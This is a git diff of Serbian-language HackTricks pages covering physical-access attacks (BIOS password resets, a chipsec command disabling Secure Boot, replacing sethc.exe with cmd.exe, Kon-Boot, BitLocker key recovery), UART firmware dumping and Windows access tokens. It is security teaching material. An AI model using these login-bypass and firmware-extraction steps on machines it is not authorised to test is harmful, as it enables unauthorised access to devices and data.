* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživački motor pokretan **dark web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **kradljivih malvera**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je **dark-web** pretraživač koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **kradljivih malvera**.
|
||||
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihov motor **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -30,7 +30,7 @@ Možete posetiti njihovu veb lokaciju i isprobati njihov motor **besplatno** na:
|
|||
|
||||
## Obnova BIOS lozinke i bezbednost sistema
|
||||
|
||||
**Resetovanje BIOS-a** može se postići na nekoliko načina. Većina matičnih ploča uključuje **bateriju** koja, kada se ukloni oko **30 minuta**, će resetovati BIOS postavke, uključujući lozinku. Alternativno, **jumper na matičnoj ploči** može se podesiti da resetuje ove postavke povezivanjem određenih pinova.
|
||||
**Resetovanje BIOS-a** može se postići na nekoliko načina. Većina matičnih ploča uključuje **bateriju** koja, kada se ukloni oko **30 minuta**, će resetovati BIOS podešavanja, uključujući i lozinku. Alternativno, **jumper na matičnoj ploči** može se podesiti da resetuje ova podešavanja povezivanjem određenih pinova.
|
||||
|
||||
Za situacije kada hardverske prilagodbe nisu moguće ili praktične, **softverski alati** nude rešenje. Pokretanje sistema sa **Live CD/USB** sa distribucijama poput **Kali Linux** omogućava pristup alatima poput **_killCmos_** i **_CmosPWD_**, koji mogu pomoći u obnovi BIOS lozinke.
|
||||
|
||||
|
@ -38,29 +38,29 @@ U slučajevima kada je BIOS lozinka nepoznata, unošenje je pogrešno **tri puta
|
|||
|
||||
### UEFI bezbednost
|
||||
|
||||
Za moderne sisteme koji koriste **UEFI** umesto tradicionalnog BIOS-a, alat **chipsec** može se koristiti za analizu i modifikaciju UEFI postavki, uključujući onemogućavanje **Secure Boot**-a. To se može postići sledećom komandom:
|
||||
Za moderne sisteme koji koriste **UEFI** umesto tradicionalnog BIOS-a, alat **chipsec** se može koristiti za analizu i modifikaciju UEFI podešavanja, uključujući onemogućavanje **Secure Boot**-a. To se može postići sledećom komandom:
|
||||
|
||||
`python chipsec_main.py -module exploits.secure.boot.pk`
|
||||
|
||||
### Analiza RAM-a i napadi hladnog podizanja sistema
|
||||
### Analiza RAM-a i napadi sa hladnim startovanjem
|
||||
|
||||
RAM zadržava podatke nakratko nakon isključivanja napajanja, obično **1 do 2 minuta**. Ova postojanost se može produžiti na **10 minuta** primenom hladnih supstanci, poput tečnog azota. Tokom ovog produženog perioda, može se napraviti **damp memorije** koristeći alate poput **dd.exe** i **volatility** za analizu.
|
||||
|
||||
### Napadi direktnog pristupa memoriji (DMA)
|
||||
### Napadi sa direktnim pristupom memoriji (DMA)
|
||||
|
||||
**INCEPTION** je alat dizajniran za **fizičku manipulaciju memorije** putem DMA, kompatibilan sa interfejsima poput **FireWire**-a i **Thunderbolt**-a. Omogućava zaobilazak postupaka prijave patchovanjem memorije da prihvati bilo koju lozinku. Međutim, neefikasan je protiv sistema **Windows 10**.
|
||||
|
||||
### Live CD/USB za pristup sistemu
|
||||
|
||||
Menjanje sistemskih binarnih datoteka poput **_sethc.exe_** ili **_Utilman.exe_** sa kopijom **_cmd.exe_** može pružiti komandnu liniju sa sistemskim privilegijama. Alati poput **chntpw** mogu se koristiti za uređivanje **SAM** datoteke Windows instalacije, omogućavajući promene lozinke.
|
||||
Menjanje sistemskih binarnih fajlova poput **_sethc.exe_** ili **_Utilman.exe_** sa kopijom **_cmd.exe_** može obezbediti komandnu liniju sa sistemskim privilegijama. Alati poput **chntpw** mogu se koristiti za uređivanje **SAM** fajla Windows instalacije, omogućavajući promene lozinke.
|
||||
|
||||
**Kon-Boot** je alat koji olakšava prijavljivanje na Windows sisteme bez poznavanja lozinke privremeno modifikujući Windows kernel ili UEFI. Više informacija možete pronaći na [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/).
|
||||
|
||||
### Postupanje sa Windows bezbednosnim funkcijama
|
||||
### Postupanje sa bezbednosnim funkcijama Windows-a
|
||||
|
||||
#### Prečice za podizanje i oporavak
|
||||
#### Prečice za podizanje sistema i oporavak
|
||||
|
||||
- **Supr**: Pristup BIOS postavkama.
|
||||
- **Supr**: Pristup BIOS podešavanjima.
|
||||
- **F8**: Ulazak u režim oporavka.
|
||||
- Pritiskanje **Shift** nakon Windows banera može zaobići automatsko prijavljivanje.
|
||||
|
||||
|
@ -70,11 +70,11 @@ Uređaji poput **Rubber Ducky**-a i **Teensyduino**-a služe kao platforme za kr
|
|||
|
||||
#### Kopiranje senki zapisa
|
||||
|
||||
Administrator privilegije omogućavaju kreiranje kopija osetljivih datoteka, uključujući **SAM** datoteku, putem PowerShell-a.
|
||||
Privilegije administratora omogućavaju kreiranje kopija osetljivih fajlova, uključujući **SAM** fajl, putem PowerShell-a.
|
||||
|
||||
### Zaobilazak BitLocker šifrovanja
|
||||
### Zaobilazak BitLocker enkripcije
|
||||
|
||||
BitLocker šifrovanje potencijalno može biti zaobiđeno ako se **ključ za oporavak** pronađe unutar datoteke sa dump-om memorije (**MEMORY.DMP**). Alati poput **Elcomsoft Forensic Disk Decryptor**-a ili **Passware Kit Forensic**-a mogu se koristiti u tu svrhu.
|
||||
BitLocker enkripcija potencijalno može biti zaobiđena ako se **ključ za oporavak** pronađe unutar fajla sa dump memorijom (**MEMORY.DMP**). Alati poput **Elcomsoft Forensic Disk Decryptor** ili **Passware Kit Forensic** mogu se koristiti u tu svrhu.
|
||||
|
||||
### Društveno inženjering za dodavanje ključa za oporavak
|
||||
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
|
@ -14,13 +14,13 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je **dark-web** pretraživač koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **kradljivih malvera**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je **dark-web** pretraživač koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **stealer malvera**.
|
||||
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
|
@ -32,28 +32,28 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
UART je serijski protokol, što znači da prenosi podatke između komponenti po jedan bit u isto vreme. Za razliku od toga, paralelni komunikacioni protokoli prenose podatke istovremeno kroz više kanala. Uobičajeni serijski protokoli uključuju RS-232, I2C, SPI, CAN, Ethernet, HDMI, PCI Express i USB.
|
||||
|
||||
Općenito, linija se drži visoko (na logičkoj vrednosti 1) dok je UART u stanju mirovanja. Zatim, da bi signalizirao početak prenosa podataka, predajnik šalje startni bit prijemniku, tokom kojeg se signal drži nisko (na logičkoj vrednosti 0). Zatim, predajnik šalje pet do osam podatkovnih bitova koji sadrže stvarnu poruku, praćenu opcionalnim bitom parnosti i jednim ili dva stop bita (sa logičkom vrednošću 1), zavisno od konfiguracije. Bit parnosti, koji se koristi za proveru grešaka, retko se viđa u praksi. Stop bitovi označavaju kraj prenosa.
|
||||
Općenito, linija se drži visoko (na logičkoj vrednosti 1) dok je UART u stanju mirovanja. Zatim, da bi signalizirao početak prenosa podataka, predajnik šalje startni bit prijemniku, tokom kojeg se signal drži nisko (na logičkoj vrednosti 0). Zatim, predajnik šalje pet do osam podatkovnih bitova koji sadrže stvarnu poruku, praćenu opcionalnim bitom parnosti i jednim ili dva stop bita (sa logičkom vrednošću 1), zavisno od konfiguracije. Bit parnosti, koji se koristi za proveru grešaka, retko se viđa u praksi. Stop bit (ili bitovi) označavaju kraj prenosa.
|
||||
|
||||
Najčešća konfiguracija naziva se 8N1: osam podatkovnih bitova, bez parnosti i jedan stop bit. Na primer, ako želimo poslati karakter C, ili 0x43 u ASCII, u UART konfiguraciji 8N1, poslali bismo sledeće bitove: 0 (startni bit); 0, 1, 0, 0, 0, 0, 1, 1 (vrednost 0x43 u binarnom obliku) i 0 (stop bit).
|
||||
Najčešću konfiguraciju zovemo 8N1: osam podatkovnih bitova, bez parnosti i jedan stop bit. Na primer, ako želimo poslati karakter C, ili 0x43 u ASCII, u UART konfiguraciji 8N1, poslali bismo sledeće bitove: 0 (startni bit); 0, 1, 0, 0, 0, 0, 1, 1 (vrednost 0x43 u binarnom obliku) i 0 (stop bit).
|
||||
|
||||
![](<../../.gitbook/assets/image (761).png>)
|
||||
|
||||
Hardverski alati za komunikaciju sa UART-om:
|
||||
|
||||
* USB-za-serijski adapter
|
||||
* USB-u-serijski adapter
|
||||
* Adapteri sa čipovima CP2102 ili PL2303
|
||||
* Višenamenski alat poput: Bus Pirate, Adafruit FT232H, Shikra ili Attify Badge
|
||||
|
||||
### Identifikacija UART portova
|
||||
|
||||
UART ima 4 porta: **TX**(Prenos), **RX**(Prijem), **Vcc**(Napon) i **GND**(Tlo). Možda ćete moći da pronađete 4 porta sa slovima **`TX`** i **`RX`** napisanim na PCB-u. Ali ako nema naznake, možda ćete morati sami da ih pronađete koristeći **multimetar** ili **logički analizator**.
|
||||
UART ima 4 porta: **TX**(Prenos), **RX**(Prijem), **Vcc**(Napon) i **GND**(Tlo). Možda ćete moći da pronađete 4 porta sa slovima **`TX`** i **`RX`** **napisanim** na PCB-u. Ali ako nema indikacija, možda ćete morati sami da ih pronađete koristeći **multimetar** ili **logički analizator**.
|
||||
|
||||
Sa **multimetrom** i isključenim uređajem:
|
||||
|
||||
* Da biste identifikovali **GND** pin koristite režim **Testa kontinuiteta**, postavite zadnju sond na tlo i testirajte crvenom sondom dok ne čujete zvuk sa multimetra. Na PCB-u se može naći nekoliko GND pinova, pa možda pronađete ili ne onaj koji pripada UART-u.
|
||||
* Da biste identifikovali **VCC port**, postavite režim **DC napona** i postavite ga na 20 V napona. Crna sonda na tlu i crvena sonda na pinu. Uključite uređaj. Ako multimetar meri konstantni napon od 3.3 V ili 5 V, pronašli ste Vcc pin. Ako dobijete druge napon, pokušajte sa drugim portovima.
|
||||
* Da biste identifikovali **TX** **port**, **DC režim napona** do 20 V napona, crna sonda na tlu, crvena sonda na pinu, i uključite uređaj. Ako pronađete da napon fluktuira nekoliko sekundi, a zatim se stabilizuje na vrednosti Vcc, verovatno ste pronašli TX port. To je zato što kada se uključi, šalje neke podatke za debagiranje.
|
||||
* **RX port** bi trebao biti najbliži od preostala 3, ima najmanju fluktuaciju napona i najmanju ukupnu vrednost od svih UART pinova.
|
||||
* Da biste identifikovali **GND** pin koristite režim **Test kontinuiteta**, postavite zadnju sondi na tlo i testirajte crvenom sondom dok ne čujete zvuk sa multimetra. Na PCB-u se može naći nekoliko GND pinova, pa možda ste pronašli ili niste onaj koji pripada UART-u.
|
||||
* Da biste identifikovali **VCC port**, postavite režim **DC napona** i postavite ga na 20 V napona. Crna sonda na tlo i crvena sonda na pin. Uključite uređaj. Ako multimetar meri konstantni napon od 3.3 V ili 5 V, pronašli ste Vcc pin. Ako dobijete druge napon, pokušajte sa drugim portovima.
|
||||
* Da biste identifikovali **TX** **port**, **DC režim napona** do 20 V napona, crna sonda na tlo, crvena sonda na pin, i uključite uređaj. Ako primetite da napon fluktuira nekoliko sekundi, a zatim se stabilizuje na vrednosti Vcc, verovatno ste pronašli TX port. To je zato što prilikom uključivanja, šalje neke podatke za debagiranje.
|
||||
* **RX port** bi trebao biti najbliži ostalima 3, ima najmanju fluktuaciju napona i najmanju ukupnu vrednost od svih UART pinova.
|
||||
|
||||
Možete pomešati TX i RX portove i ništa se neće desiti, ali ako pomešate GND i VCC port možete uništiti krug.
|
||||
|
||||
|
@ -61,7 +61,7 @@ Na nekim ciljnim uređajima, UART port je onemogućen od strane proizvođača on
|
|||
|
||||
### Identifikacija UART Baud Rate
|
||||
|
||||
Najlakši način identifikacije ispravnog baud rate-a je da pogledate **izlaz TX pina i pokušate pročitati podatke**. Ako podaci koje primate nisu čitljivi, pređite na sledeći mogući baud rate dok podaci ne postanu čitljivi. Možete koristiti USB-za-serijski adapter ili višenamenski uređaj poput Bus Pirate-a za ovo, uparen sa pomoćnim skriptom, poput [baudrate.py](https://github.com/devttys0/baudrate/). Najčešći baud rate-ovi su 9600, 38400, 19200, 57600 i 115200.
|
||||
Najlakši način identifikacije ispravnog baud rate-a je da pogledate **izlaz TX pina i pokušate pročitati podatke**. Ako podaci koje primate nisu čitljivi, pređite na sledeći mogući baud rate dok podaci ne postanu čitljivi. Možete koristiti USB-u-serijski adapter ili višenamenski uređaj poput Bus Pirate-a za ovo, uparen sa pomoćnim skriptom, poput [baudrate.py](https://github.com/devttys0/baudrate/). Najčešći baud rate-ovi su 9600, 38400, 19200, 57600 i 115200.
|
||||
|
||||
{% hint style="danger" %}
|
||||
Važno je napomenuti da u ovom protokolu morate povezati TX jednog uređaja sa RX drugog!
|
||||
|
@ -89,17 +89,17 @@ Podesite postavke poput brzine prenosa i imena uređaja u opciji `Podešavanje s
|
|||
|
||||
Nakon konfiguracije, koristite komandu `minicom` da biste pokrenuli UART konzolu.
|
||||
|
||||
## UART putem Arduino UNO R3 (Uklonive ploče čipa Atmel 328p)
|
||||
## UART putem Arduino UNO R3 (Uklonive Atmel 328p ploče sa čipom)
|
||||
|
||||
U slučaju da UART serijski do USB adapteri nisu dostupni, Arduino UNO R3 može se koristiti uz brzi trik. Budući da je Arduino UNO R3 obično dostupan bilo gde, ovo može uštedeti puno vremena.
|
||||
U slučaju da serijski USB adapteri nisu dostupni, Arduino UNO R3 može se koristiti uz brzi trik. Budući da je Arduino UNO R3 obično dostupan bilo gde, ovo može uštedeti puno vremena.
|
||||
|
||||
Arduino UNO R3 ima USB do serijskog adaptera ugrađenog na samoj ploči. Da biste uspostavili UART vezu, jednostavno izvadite mikrokontroler čip Atmel 328p sa ploče. Ovaj trik radi na varijantama Arduino UNO R3 koje nemaju čip Atmel 328p zalemljen na ploču (u njemu se koristi SMD verzija). Povežite RX pin Arduina (Digitalni Pin 0) sa TX pinom UART interfejsa i TX pin Arduina (Digitalni Pin 1) sa RX pinom UART interfejsa.
|
||||
Arduino UNO R3 ima USB-Serial adapter ugrađen na samoj ploči. Da biste uspostavili UART vezu, jednostavno izvadite Atmel 328p mikrokontroler čip sa ploče. Ovaj trik funkcioniše na varijantama Arduino UNO R3 koje nemaju Atmel 328p zalemljen na ploči (u njoj se koristi SMD verzija). Povežite RX pin Arduina (Digitalni Pin 0) sa TX pinom UART interfejsa i TX pin Arduina (Digitalni Pin 1) sa RX pinom UART interfejsa.
|
||||
|
||||
Na kraju, preporučuje se korišćenje Arduino IDE-a za dobijanje serijske konzole. U `alatkama` u meniju, izaberite opciju `Serijska konzola` i postavite brzinu prenosa prema UART interfejsu.
|
||||
Na kraju, preporučuje se korišćenje Arduino IDE-a za pristup serijskoj konzoli. U odeljku `alatke` u meniju, izaberite opciju `Serijska konzola` i postavite brzinu prenosa prema UART interfejsu.
|
||||
|
||||
## Bus Pirate
|
||||
|
||||
U ovom scenariju ćemo prisluškivati UART komunikaciju Arduina koji šalje sve ispisane poruke programa na serijski monitor.
|
||||
U ovom scenariju, pratimo UART komunikaciju Arduina koji šalje sve ispisane poruke programa na serijski monitor.
|
||||
```bash
|
||||
# Check the modes
|
||||
UART>m
|
||||
|
@ -171,40 +171,40 @@ Escritura inicial completada:
|
|||
AAA Hi Dreg! AAA
|
||||
waiting a few secs to repeat....
|
||||
```
|
||||
## Dumpovanje Firmware-a putem UART konzole
|
||||
## Dumpovanje Firmware-a pomoću UART konzole
|
||||
|
||||
UART konzola pruža odličan način za rad sa osnovnim firmware-om u okruženju u toku izvršavanja. Međutim, kada je pristup UART konzoli samo za čitanje, to može uvesti mnogo ograničenja. Kod mnogih ugrađenih uređaja, firmware je smešten u EEPROM-ima i izvršava se u procesorima koji imaju nestabilnu memoriju. Stoga se firmware čuva samo za čitanje jer je originalni firmware tokom proizvodnje unutar samog EEPROM-a i bilo koji novi fajlovi bi se izgubili zbog nestabilne memorije. Stoga, dumpovanje firmware-a je vredan napor prilikom rada sa ugrađenim firmware-ima.
|
||||
UART konzola pruža odličan način za rad sa osnovnim firmware-om u okruženju u realnom vremenu. Međutim, kada je pristup UART konzoli samo za čitanje, to može uvesti mnogo ograničenja. Na mnogim ugrađenim uređajima, firmware je smešten u EEPROM-ima i izvršava se u procesorima koji imaju volatilnu memoriju. Stoga se firmware čuva samo za čitanje jer je originalni firmware tokom proizvodnje unutar samog EEPROM-a i bilo koji novi fajlovi bi se izgubili zbog volatilne memorije. Stoga, dumpovanje firmware-a je vredan napor prilikom rada sa ugrađenim firmware-ima.
|
||||
|
||||
Postoji mnogo načina da se to uradi, a odeljak SPI pokriva metode za izvlačenje firmware-a direktno iz EEPROM-a sa različitim uređajima. Iako se preporučuje prvo pokušati dumpovanje firmware-a putem UART-a jer dumpovanje firmware-a sa fizičkim uređajima i spoljnim interakcijama može biti rizično.
|
||||
Postoji mnogo načina da se to uradi, a sekcija SPI pokriva metode za izvlačenje firmware-a direktno iz EEPROM-a sa različitim uređajima. Iako se preporučuje prvo pokušati dumpovanje firmware-a putem UART-a jer dumpovanje firmware-a sa fizičkim uređajima i spoljnim interakcijama može biti rizično.
|
||||
|
||||
Dumpovanje firmware-a putem UART konzole zahteva prvo pristup bootloader-ima. Mnogi popularni proizvođači koriste <b>uboot</b> (Universal Bootloader) kao svoj bootloader za učitavanje Linux-a. Stoga, pristup <b>uboot</b> je neophodan.
|
||||
Dumpovanje firmware-a sa UART konzole zahteva prvo pristup bootloaderima. Mnogi popularni proizvođači koriste <b>uboot</b> (Universal Bootloader) kao svoj bootloader za učitavanje Linux-a. Stoga, pristup <b>uboot</b> je neophodan.
|
||||
|
||||
Da biste pristupili <b>boot</b> bootloader-u, povežite UART port sa računarom i koristite bilo koji od alata za serijsku konzolu i držite isključeno napajanje uređaja. Kada je postavka spremna, pritisnite taster Enter i držite ga. Na kraju, povežite napajanje uređaja i pustite ga da se podigne.
|
||||
Da biste pristupili <b>boot</b> bootloaderu, povežite UART port sa računarom i koristite bilo koji od alata za serijsku konzolu i držite isključeno napajanje uređaja. Kada je postavka spremna, pritisnite taster Enter i držite ga. Konačno, povežite napajanje uređaja i pustite ga da se podigne.
|
||||
|
||||
Ovim će se prekinuti učitavanje <b>uboot</b>-a i prikazaće se meni. Preporučuje se da se razumeju <b>uboot</b> komande i da se koristi meni pomoći za njihovo listanje. Ovo bi mogla biti `help` komanda. Pošto različiti proizvođači koriste različite konfiguracije, neophodno je razumeti svaku od njih posebno.
|
||||
Ovim će se prekinuti učitavanje <b>uboot</b>-a i prikazaće se meni. Preporučuje se razumevanje <b>uboot</b> komandi i korišćenje menija pomoći da ih izlistate. Ovo bi mogla biti `help` komanda. Pošto različiti proizvođači koriste različite konfiguracije, neophodno je razumeti svaku od njih posebno.
|
||||
|
||||
Obično, komanda za dumpovanje firmware-a je:
|
||||
```
|
||||
md
|
||||
```
|
||||
što znači "memorijsko pražnjenje". Ovo će isprazniti memoriju (EEPROM sadržaj) na ekranu. Preporučuje se da zabeležite izlaz serijske konzole pre početka postupka kako biste uhvatili memorijsko pražnjenje.
|
||||
što znači "memorijsko pražnjenje". Ovo će isprazniti memoriju (EEPROM sadržaj) na ekranu. Preporučuje se beleženje izlaza serijske konzole pre početka postupka kako bi se uhvatilo memorijsko pražnjenje.
|
||||
|
||||
Na kraju, jednostavno uklonite sav nepotreban podatak iz datoteke zapisa i sačuvajte datoteku kao `imefajla.rom` i koristite binwalk za izvlačenje sadržaja:
|
||||
Na kraju, jednostavno uklonite sav nepotreban podatak iz datoteke dnevnika i sačuvajte datoteku kao `imefajla.rom` i koristite binwalk za izvlačenje sadržaja:
|
||||
```
|
||||
binwalk -e <filename.rom>
|
||||
```
|
||||
Ovo će navesti moguće sadržaje iz EEPROM-a prema potpisima pronađenim u hex datoteci.
|
||||
Ovo će izlistati moguće sadržaje iz EEPROM-a prema potpisima pronađenim u hex datoteci.
|
||||
|
||||
Iako je potrebno napomenuti da nije uvek slučaj da je <b>uboot</b> otključan čak i ako se koristi. Ako taster Enter ne radi ništa, proverite različite tastere poput tastera Space, itd. Ako je bootloader zaključan i ne može se prekinuti, ovaj metod neće raditi. Da biste proverili da li je <b>uboot</b> bootloader za uređaj, proverite izlaz na UART konzoli prilikom pokretanja uređaja. Moglo bi se pomenuti <b>uboot</b> prilikom pokretanja.
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web**-om koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade informacije**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač na **dark webu** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade informacije**.
|
||||
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomverom koji proizilaze iz malvera koji krade informacije.
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji kradu informacije.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
|
@ -217,7 +217,7 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA ČLANSTVO**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
|
||||
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Da li radite u **kompaniji za kibernetičku bezbednost**? Želite li da vidite svoju **kompaniju reklamiranu na HackTricks**? ili želite pristup **najnovijoj verziji PEASS ili preuzimanje HackTricks u PDF formatu**? Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Da li radite u **kompaniji za kibernetičku bezbednost**? Želite li da vidite svoju **kompaniju reklamiranu na HackTricks**? ili želite pristup **najnovijoj verziji PEASS-a ili preuzimanje HackTricks-a u PDF formatu**? Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Pridružite se** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili me **pratite** na **Twitteru** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
|
@ -12,15 +12,15 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
Možete posetiti njihovu veb stranicu i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -28,7 +28,7 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
## Pristupni tokeni
|
||||
|
||||
Svaki **korisnik prijavljen** na sistem **poseduje pristupni token sa bezbednosnim informacijama** za tu sesiju prijavljivanja. Sistem kreira pristupni token kada se korisnik prijavi. **Svaki proces izvršen** u ime korisnika **ima kopiju pristupnog tokena**. Token identifikuje korisnika, grupe korisnika i privilegije korisnika. Token takođe sadrži SID prijave (Security Identifier) koji identifikuje trenutnu sesiju prijavljivanja.
|
||||
Svaki **korisnik prijavljen** na sistem **poseduje pristupni token sa informacijama o bezbednosti** za tu sesiju prijavljivanja. Sistem kreira pristupni token kada se korisnik prijavi. **Svaki proces izvršen** u ime korisnika **ima kopiju pristupnog tokena**. Token identifikuje korisnika, grupe korisnika i privilegije korisnika. Token takođe sadrži SID prijave (Security Identifier) koji identifikuje trenutnu sesiju prijavljivanja.
|
||||
|
||||
Možete videti ove informacije izvršavanjem `whoami /all`
|
||||
```
|
||||
|
@ -85,31 +85,31 @@ Ako imate **validne pristupne podatke bilo kog drugog korisnika**, možete **kre
|
|||
```
|
||||
runas /user:domain\username cmd.exe
|
||||
```
|
||||
**Pristupni token** takođe ima **referencu** sesija prijavljivanja unutar **LSASS**, što je korisno ako proces treba da pristupi nekim objektima na mreži.\
|
||||
**Pristupni token** takođe ima **referencu** na sesije prijavljivanja unutar **LSASS**, što je korisno ako proces treba da pristupi nekim objektima na mreži.\
|
||||
